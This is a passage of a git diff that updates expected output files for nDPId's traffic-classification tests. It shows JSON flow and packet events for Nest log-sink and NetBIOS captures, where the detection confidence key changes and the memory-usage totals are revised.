00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":836,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1536718206638,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536718206638,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAAC0GJHkjrlLtwKjyDytX93jm8XvxCTEl4mASaQNQ+QAAAgQFtA=="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":837,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1536718206640,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536718206640,"pkt":"AJD7JidrGLQwJjRACABFAAAoMLgAAP8GYcTAqPIPI65S7fd4K1cJMSXi5vF78lAQEgC\/uQAAAAAAAAAA"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":844,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536718206572,"flow_last_seen":1536718208745,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":676,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536718208745,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63352,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":844,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536718206572,"flow_last_seen":1536718208745,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":676,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536718208745,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63352,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":858,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536718209313,"flow_last_seen":1536718209313,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536718209313,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63353,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":858,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1536718209313,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536718209313,"pkt":"AJD7JidrGLQwJjRACABFAAAsMMIAAP8GGdvAqPIPI7yauvd5K1cJPKL3AAAAAGACEgBHJwAAAgQEgAAA"} 
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":860,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1536718209383,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536718209383,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAADcG0p0jvJq6wKjyDytX93le92HNCTyi+GASbvAoVQAAAgQFjA=="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":861,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1536718209385,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536718209385,"pkt":"AJD7JidrGLQwJjRACABFAAAoMMQAAP8GGd3AqPIPI7yauvd5K1cJPKL4XvdhzlAQEgCc2gAAAAAAAAAA"} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":866,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536718209313,"flow_last_seen":1536718211481,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1262,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536718211481,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63353,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 
-00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":892,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1536718052990,"flow_last_seen":1536718206634,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":3362,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1536718332214,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63350,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} -00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":892,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1536718202984,"flow_last_seen":1536718206546,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":9459,"flow_avg_l4_payload_len":193,"midstream":0,"thread_ts_msec":1536718332214,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63351,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 
-00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":892,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1536718209313,"flow_last_seen":1536718211968,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":2258,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1536718332214,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63353,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":896,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1536718202959,"flow_last_seen":1536718202959,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1536718392405,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":866,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536718209313,"flow_last_seen":1536718211481,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1262,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536718211481,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63353,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":892,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1536718052990,"flow_last_seen":1536718206634,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":3362,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1536718332214,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63350,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":892,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1536718202984,"flow_last_seen":1536718206546,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":9459,"flow_avg_l4_payload_len":193,"midstream":0,"thread_ts_msec":1536718332214,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63351,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 
+00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":892,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1536718209313,"flow_last_seen":1536718211968,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":2258,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1536718332214,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63353,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":896,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1536718202959,"flow_last_seen":1536718202959,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1536718392405,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00568{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":900,"source":"nest_log_sink.pcap","alias":"nDPId-test","packets-captured":900,"packets-processed":713,"total-skipped-flows":0,"total-l4-payload-len":75380,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":17,"total-detection-updates":4,"total-updates":0,"current-active-flows":1,"total-active-flows":17,"total-idle-flows":16,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":116,"global_ts_msec":1536718512170} 
00568{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":950,"source":"nest_log_sink.pcap","alias":"nDPId-test","packets-captured":950,"packets-processed":743,"total-skipped-flows":0,"total-l4-payload-len":75380,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":17,"total-detection-updates":4,"total-updates":0,"current-active-flows":1,"total-active-flows":17,"total-idle-flows":16,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":117,"global_ts_msec":1536719113902} 00570{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1000,"source":"nest_log_sink.pcap","alias":"nDPId-test","packets-captured":1000,"packets-processed":773,"total-skipped-flows":0,"total-l4-payload-len":75380,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":17,"total-detection-updates":4,"total-updates":0,"current-active-flows":1,"total-active-flows":17,"total-idle-flows":16,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":118,"global_ts_msec":1536719715232} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":96,"flow_first_seen":1536718206572,"flow_last_seen":1536719715232,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":676,"flow_tot_l4_payload_len":3846,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1536719715232,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63352,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":96,"flow_first_seen":1536718206572,"flow_last_seen":1536719715232,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":676,"flow_tot_l4_payload_len":3846,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1536719715232,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63352,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 00572{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1000,"source":"nest_log_sink.pcap","alias":"nDPId-test","packets-captured":1000,"packets-processed":774,"total-skipped-flows":0,"total-l4-payload-len":75380,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":17,"total-detection-updates":4,"total-updates":0,"current-active-flows":0,"total-active-flows":17,"total-idle-flows":17,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":120,"global_ts_msec":1536719715232} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1000/774 @@ -126,9 +126,9 @@ ~~ total active/idle flows...: 17/17 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5933425 bytes -~~ total memory freed........: 5933425 bytes -~~ total allocations/frees...: 118964/118964 +~~ total memory allocated....: 6067059 bytes +~~ total memory freed........: 6067059 bytes +~~ total allocations/frees...: 121726/121726 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 805 chars 
diff --git a/test/results/netbios.pcap.out b/test/results/netbios.pcap.out
index f45997a53..b67458300 100644
--- a/test/results/netbios.pcap.out
+++ b/test/results/netbios.pcap.out
@@ -2,72 +2,72 @@ 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"netbios.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1447772210350} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"netbios.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772210350,"flow_last_seen":1447772210350,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772210350,"l3_proto":"ip4","src_ip":"10.0.4.131","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"netbios.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1447772210350,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1447772210350,"pkt":"\/\/\/\/\/\/\/\/ABj+bLz3CABFAABOYvYAAIARuScKAASDCgAF\/wCJAIkAOr8ep0kBEAABAAAAAAAAIEZJRkRGRUZDRUZFQkVORlBFSUZKQ0FDQUNBQ0FDQUFBAAAgAAE="} 
-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"netbios.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772210350,"flow_last_seen":1447772210350,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772210350,"l3_proto":"ip4","src_ip":"10.0.4.131","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"netbios.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772210350,"flow_last_seen":1447772210350,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772210350,"l3_proto":"ip4","src_ip":"10.0.4.131","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"netbios.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1447772210821,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1447772210821,"pkt":"\/\/\/\/\/\/\/\/ABj+bLz3CABFAABOYvkAAIARuSQKAASDCgAF\/wCJAIkAOr8dp0oBEAABAAAAAAAAIEZJRkRGRUZDRUZFQkVORlBFSUZKQ0FDQUNBQ0FDQUFBAAAgAAE="} 
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"netbios.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1447772210835,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1447772210835,"pkt":"\/\/\/\/\/\/\/\/ABj+bLz3CABFAABOYvoAAIARuSMKAASDCgAF\/wCJAIkAOr8fp0gBEAABAAAAAAAAIEZJRkRGRUZDRUZFQkVORlBFSUZKQ0FDQUNBQ0FDQUFBAAAgAAE="} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"netbios.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772211392,"flow_last_seen":1447772211392,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772211392,"l3_proto":"ip4","src_ip":"10.0.5.233","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"netbios.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1447772211392,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1447772211392,"pkt":"\/\/\/\/\/\/\/\/AOCBt8asCABFAABOKuIAAIAR79UKAAXpCgAF\/wCJAIkAOuD1mh4BEAABAAAAAAAAIEVQRktFSkNBQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0FDQUJNAAAgAAE="} 
-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"netbios.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772211392,"flow_last_seen":1447772211392,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772211392,"l3_proto":"ip4","src_ip":"10.0.5.233","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"netbios.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772211392,"flow_last_seen":1447772211392,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772211392,"l3_proto":"ip4","src_ip":"10.0.5.233","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"netbios.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1447772212142,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1447772212142,"pkt":"\/\/\/\/\/\/\/\/AOCBt8asCABFAABOLrMAAIAR7AQKAAXpCgAF\/wCJAIkAOuD1mh4BEAABAAAAAAAAIEVQRktFSkNBQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0FDQUJNAAAgAAE="} 
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"netbios.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1447772212892,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1447772212892,"pkt":"\/\/\/\/\/\/\/\/AOCBt8asCABFAABOMrEAAIAR6AYKAAXpCgAF\/wCJAIkAOuD1mh4BEAABAAAAAAAAIEVQRktFSkNBQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0FDQUJNAAAgAAE="} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"netbios.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772214344,"flow_last_seen":1447772214344,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1447772214344,"l3_proto":"ip4","src_ip":"10.0.5.9","dst_ip":"10.0.5.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00713{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"netbios.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1447772214344,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1447772214344,"pkt":"\/\/\/\/\/\/\/\/ADBIsLGUCABFAADlUKwAAIARylQKAAUJCgAF\/wCKAIoA0VBGEQ7C9AoABQkAigC7AAAgRU9GR0ZDREpDQUNBQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0EAIEZHRUpFSEVKRU1FQkVPRkVGUEVIRkNFUEZGRkFDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAIQAAAAAAAAAAAOgDAAAAAAAAAAAhAFYAAwABAAAAAgAyAFxNQUlMU0xPVFxCUk9XU0UAAQCA\/AoATlZSOQAAAAAAAAAAAAAAAAYBBxABAA8BVaoA"} 
-00759{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"netbios.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772214344,"flow_last_seen":1447772214344,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1447772214344,"l3_proto":"ip4","src_ip":"10.0.5.9","dst_ip":"10.0.5.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00759{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"netbios.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772214344,"flow_last_seen":1447772214344,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1447772214344,"l3_proto":"ip4","src_ip":"10.0.5.9","dst_ip":"10.0.5.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 
00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"netbios.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772216537,"flow_last_seen":1447772216537,"flow_idle_time":7580000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":1,"midstream":1,"thread_ts_msec":1447772216537,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.4.131","src_port":139,"dst_port":1398,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"netbios.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1447772216537,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":21,"thread_ts_msec":1447772216537,"pkt":"ABj+bLz3ABzEEHkPCABFAAApQatAAIAGnIkKAAQYCgAEgwCLBXatXRk68Re6KFAQ96kjtgAAAAAAAAAA"} 